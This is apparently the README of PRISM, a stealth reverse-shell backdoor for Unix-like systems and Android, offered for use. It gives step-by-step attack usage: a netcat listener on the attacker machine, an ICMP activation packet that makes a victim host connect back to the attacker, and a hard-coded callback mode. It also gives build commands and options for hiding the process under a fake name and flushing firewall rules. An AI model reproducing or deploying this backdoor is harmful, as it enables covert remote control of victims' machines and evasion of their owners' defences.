PRISM is an user space stealth reverse shell backdoor. The code is available on GitHub.
It has been fully tested on:
- Linux
- Solaris
- AIX
- BSD/Mac
- Android
PRISM can works in two different ways: ICMP and STATIC mode.
Using this operation mode the backdoor waits silently in background for a specific ICMP packet containing the host/port to connect back and a private key to prevent third party access.
- First, run netcat on the attacker machine to wait for incoming connection from the backdoor:
$ nc -l -p 6666
- Using the sendPacket.py script (or another packet builder) send the activation packet to the backdoor:
./sendPacket.py 192.168.0.1 p4ssw0rd 192.168.0.10 6666
192.168.0.1 is the victim machine running prism backdoor
p4ssw0rd is the key
192.168.0.10 is the attacker machine address
6666 is the attacker machine port
- The backdoor will connect back to netcat!
Using this operation mode the backdoor try to connects to an hard-coded IP/PORT.
In this case, just run netcat listening on the hard-coded machine/port:
$ nc -l -p [PORT]
- Two operating modes (ICMP and STATIC)
- Runtime process renaming
- No listening ports
- Automatic iptables rules flushing
- Written in pure C
- No library dependencies
git clone https://github.com/andreafabrizi/prism.git
Before building, you have to configure the backdoor editing the source code.
Following the configuration parameters description:
STATIC mode:
REVERSE_HOST: Machine address to connect back
REVERSE_PORT: Machine port to connect back
RESPAWN_DELAY: Time, in seconds, between each connection
ICMP mode:
ICMP_KEY: Key/Password to activate the backdoor
Generic parameters:
MOTD: Message to be printed at the backdoor connection
SHELL: Shell to execute
PROCESS_NAME: Fake process name
gcc <..OPTIONS..> -Wall -s -o prism prism.c
Available GCC options:
-DDETACH #Run the process in background
-DSTATIC #Enable STATIC mode (default is the ICMP mode)
-DNORENAME #Doesn't renames the process
-DIPTABLES #Try to flush all iptables rules
Example:
gcc -DDETACH -DNORENAME -Wall -s -o prism prism.c
-
Android
Change the shell to /system/bin/sh
apt-get install gcc-arm-linux-gnueabi
arm-linux-gnueabi-gcc -DSTATIC -DDETACH -DNORENAME -static -march=armv5 prism.c -o prism
-
Linux 64bit (using a 32bit host system)
apt-get install libc6-dev-amd64
gcc -DDETACH -m64 -Wall -s -o prism prism.c
-
Linux 32bit (using a 64bit host system)
apt-get install libc6-dev-i386
gcc -DDETACH -m32 -Wall -s -o prism prism.c
The backdoor ignore any command line parameter, except the Inf0 (the last char is a digit).
This option allow you to see some information about the backdoor:
$ ./prism Inf0
Version: 0.5
Mode: icmp
Key: p455w0rD
Process name: [udevd]
Shell: /bin/sh
Detach: Yes
Flush Iptables: No